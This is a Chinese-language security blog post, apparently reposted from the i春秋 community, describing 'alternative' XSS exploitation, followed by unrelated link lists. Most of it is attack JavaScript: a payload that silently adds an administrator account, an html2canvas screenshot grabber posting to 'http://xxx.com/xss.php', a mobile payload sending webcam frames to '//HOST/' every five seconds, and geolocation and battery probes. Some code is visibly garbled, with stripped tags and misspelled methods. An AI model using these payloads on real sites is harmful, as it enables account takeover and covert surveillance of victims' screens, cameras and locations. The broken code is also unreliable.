XSS漏洞的渗透利用另类玩法

2017-08-08 18:20程序设计/微软/手机

作者:色豹

i春秋社区

今天就来讲一下大家都熟悉的 xss漏洞的渗透利用。相信大家对xss已经很熟悉了,但是很多安全人员的意识里 xss漏洞危害只有弹窗或者窃取cookie。但是xss还有更多的花式玩法,今天将介绍几种。

1. xss渗透添加管理员

后台触发存储型XSS,网站设置http-only,窃取的cookie无效。那么如何在这种情况下利用xss漏洞。

无法获取cookie,但是我们可以利用xss漏洞,以管理员的权限,添加一个新的管理员。没错,就是让管理员给我们加一个高权限账号。

这里我们会用到 Java和Ajax 技术。 利用xmlhttp 发送一个http请求,在后台发送一个添加管理员的post请求。

var request = false;

if(window.) {

request = new.();

if(request.overrideMimeType) {

request.overrideMimeType('text/html');

}

} else if(Window.ActiveXObject) {

var versions = {'Microsoft.XMLHTTP','MSXML_XMLHTTP','Microsoft.XMLHTTP','Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0','Msxml2.XMLHTTP.4.0','Msxml2.XMLHTTP.3.0','Msxml2.XMLHTTP'};

for(var i=0; i<versions.length; i ++){

try{

request = new ActiveXObject(versions);

}catch(e){}

}

}

xmlhttp = request;

add_admin();

function add_admin(){

var url = "/admin/admin_add_user.php"; //添加用户请求地址

var params = "username=xss&passwod=123456&email=xss@xss.com&submit=1" //添加用户post数据

xmlhttp.open("POST",url,true);

xmlhttp.setRequstHeader("Content-type","application/x-www-form-urlencoded")

xmlhttp.setRequstHeader("Content-length",params.length);

xmlhttp.setRequstHeader("Connection","close")

}

2. xss截取客户的屏幕

现在随着技术的进步,前端技术支持的面非常广泛。xss漏洞可以利用html5的 canvas 来进行屏幕的截屏功能,类似于远程控制木马查看对方屏幕功能。这个可以大大的提高对于进一步入侵的信息收集。废话不说直接上代码。

这里需要用到一个js库html2canvas.js

document.write("< src="html2canvas.js></>");

window.=function(){

html2canvas(document.body, {

onrendered: function(canvas) {

//下面开始把抓取到的屏幕图片代码传输和接收,由于代码非常的长,只能使用post

xhr=function(){

var request = false;

if(window.){

request = new ();

}else if (window.ActiveXObject){

try{

request = new window.ActiveXObject('Microsoft.XMLHTTP');

}catch(e){

}

}

return request;

}();

request = function(method,src,argv,content_type){

xhr.open(method,src,false);

if(method=='POST')xhr.setRequestHeader('Content-type',content_type);

xhr.send(argv); //发送POST数据

return xhr.responseText;

};

attack_a = function(){

var src = "http://xxx.com/xss.php?"; //post接收地址

var argv_0 = "'&screenshot="+canvas.toDataURL(); //post字段名称为screenshot

request("POST",src,argv_0,"application/x-www-form-urlencoded");

};

attack_a();

}

});

}

上面的代码是针对 pc端的截屏,手机端的截屏xss代码有所不同

<>

d=document;

v=d.('video');

c=d.('canvas');

c.width=640;

c.height=480;

navigator.webkitGetUserMedia({'video':true},function(s){

v.src=URL.createObjectURL(s);v.play()},function(){});

c2=c.getContext('2d');

x='c2.drawImage(v,0,0,640,480);fetch("//HOST/"+c2.canvas.toDataURL())';

setInterval(x,5000);

</>

这两种服务端获取到的post数据包是 格式的 ,我们只要进行转码即可看到对方的屏幕截图。

3.xss对移动端的渗透

现在越来越多的人喜欢用手机查看网页,xss针对手机端的支持也很友好。

这里只针对手机端Firefox浏览器说明。

xss获取对方经纬度代码

<>

navigator.geolocation.getCurrentPosition(function(p){

alert('Latitude:'+p.coords.latitude+',Longitude:'+

p.coords.longitude+',Altitude:'+p.coords.altitude);})

</>

xss获取电池状态的代码,这里需要用到Java Battery API

<svg =alert(navigator.battery.level)>

<svg =alert(navigator.battery.dischargingTime)>

<svg =alert(navigator.battery.charging)>

什么是白帽子?是把技术融入生活,变成故事,宣扬正义。邀请你来i春秋社区,呈现你的故事,讲述你的精彩,欢迎大家来“稿”!

1.【探索新思路】

记一次Github项目被fork后的删除经历

【相信经常使用Github平台来托管程序代码的同学可能都会遇到自己项目被未授权fork走的情况,本人最近就遭遇了这样的情况。】

https://bbs.ichunqiu.com/thread-25588-1-1.html

2.【思路分享】

记一次XSS防御绕过的过程 记一次XSS防御绕过的过程

【一个闲的蛋疼的周末,总想搞点事情,于是在网上找到了个cms系统,得挖出点什么来,嘿嘿】

https://bbs.ichunqiu.com/thread-25625-1-1.html

3.【思路分享】

攻破黑市最流行的钓鱼网站2

【上次有人向我反映,我讲的过于快了,不适合菜鸟看,所以这次我写的相对来说比较详细~ 这对于有基础的人来说可能比较煎熬,哈哈】

https://bbs.ichunqiu.com/thread-25640-1-1.html

4.【思路分享】

看我如何通过野路子撸下权6的BBS论坛

【前两天发现一个BBS社区有解析漏洞,但是注册账号以后发现普通会员没有上传图片权限,只有头像处可以传,但抓不到路径就放弃了,今天想起来就继续研究了下。】

https://bbs.ichunqiu.com/thread-25613-1-1.html

XSS漏洞的渗透利用另类玩法相关推荐

  1. 【XSS技巧拓展】————14、XSS攻击另类玩法

    今天就来讲一下大家都熟悉的 xss漏洞的攻击利用.相信大家对xss已经很熟悉了,但是很多安全人员的意识里 xss漏洞危害只有弹窗或者窃取cookie.但是xss还有更多的花式玩法,今天将介绍几种. 1 ...

  2. 59深度解密五十九:利用“抖音”进行吸粉的简单、另类玩法

    网络营销推广技术.技巧深度解密(五十九)指南: 1.本文档适合零基础和互联网营销推广工作者,主要讲解抖音吸粉的问题. 2.原创版权文档,任何抄袭或者全部.部分模仿都是侵权行为. 3.敬畏法律,尊重原创 ...

  3. BIOS INT 10-13功能调用的“另类”玩法

    http://www.cnblogs.com/ljf9201314/archive/2008/07/21/1247653.html BIOS INT 10-13功能调用的"另类"玩 ...

  4. 软件也兼职 Word2003的另类玩法(转)

    软件也兼职 Word2003的另类玩法(转)[@more@] 大家都知道Word是文字处理软件中佼佼者,不过你知道吗?它还可以播放网络电影.Flash,还具有英汉双向翻译,给词语加注解等有趣功能,本文 ...

  5. Beef加载msf插件---metasploit对IE浏览器的极光漏洞进行渗透利用

    1.配置文件的修改 输入下列命令,打开配置文件, 在图中所示的地方,作出如下修改 再接着输入以下命令,打开另一个配置文件 注意下图所示的三个地方,以及user和pass 接下来切换到beef主目录之下 ...

  6. 固态和机械硬盘组raid_另类玩法 固态盘和机械盘竟能组RAID

    另类玩法 固态盘和机械盘竟能组RAID RAID有很多种,其中RAID 0最为人所熟知,因为它可以成倍地提升存储设备性能.虽然现在组建RAID的过程已经不那么麻烦甚至非常简单,但是很多人依然认为RAI ...

  7. XSS漏洞原理和利用

    XSS漏洞原理和利用 XSS漏洞的危害 1.窃取用户Cookie,如果用户Cookie被窃取,攻击者可以不通过密码,而直接登录用户账户 2.使用XMLHttpRequest构造模拟用户请求操作 3.X ...

  8. Metasploit 对 IE 浏览器的极光漏洞进行渗透利用

    极光漏洞实际上是利用了堆喷射技术.下面我们来演示渗透过程. 1.查看 win xp 系统状态 目前的cpu和内存消耗极低. 2.在kali linux下利用 metasploit 渗透. msf &g ...

  9. 表情包项目的另类玩法,月赚好几W,情感萌宠精准拿捏用户

    文章目录 调研 分析 操作 图片 文案 bgm 链接 调研   这几天我有看到一位博主,他搞了个表情包项目,一个月赚了五六万.我们看下他的视频点赞量,真的不差.   而且我看了下,他玩这个表情包项目的 ...

  10. 另类玩法,使用 REST API 操作 RabbitMQ

    文章目录 1. REST API 2. 开启 Web 管理页面 3. 实践 3.1 查看队列统计数据 3.2 创建队列 3.3 查看当前连接信息 3.4 查看当前用户信息 3.5 创建一个用户 3.6 ...

最新文章

  1. 机器翻译评测——BLEU算法详解 (新增 在线计算BLEU分值)评估
  2. Visitor(访问者)模式在SAP CDS view测试框架中的灵活运用
  3. 智能家居 (1) ——智能家居整体功能框架
  4. Bootstrap3 表单静态控件
  5. react-native ES5与ES6写法对照表
  6. UVA10733 The Colored Cubes【Polya定理】
  7. 从零基础入门Tensorflow2.0 ----九、44.3 keras模型转换成savedmodel
  8. 黑马程序员全套Java教程_Java基础入门视频教程零基础自学Java必备教程视频讲义(1)
  9. 传奇新增物品和装备的内观外观及特效Pak文件详解
  10. 数据库SQL执行计划
  11. ssh 远程连接、上传下载命令
  12. Android实战【仿探探陌生社交APP】
  13. cad在服务器那个文件夹,CAD存放文件的路径默认在哪里
  14. Notepad软件的下载安装和使用
  15. 数字197可以被称为循环素数,因为197的三个数位循环移位后的数字:197,971,719均为素数。100以内这样的数字包括13个,2,3,5,7,11,13,17,31,37,71,73,79,97
  16. 基金使用计划 数学建模 matlab,数学建模论文-基金使用计划
  17. HDU6124 Euler theorem
  18. Linux部署IPFS(分布式存储系统)私有网络
  19. 前端导出zip格式压缩包
  20. 科技有意思丨iPhone8新添AR功能?!你的肾还保得住吗

热门文章

  1. HTMl5 的新特性
  2. AutoTile 自动拼接(四) 学习与实践
  3. 考研政治思维导图之马克思主义基本原理
  4. NOIP引水入城(dfs)
  5. Redis进阶之redis的生命周期
  6. centos 搭建nfs服务器
  7. icinga+cacti整合
  8. 不要做干自己没时间做的事
  9. [SHELL进阶] (转)最牛B的 Linux Shell 命令 (三)
  10. js中java式的类成员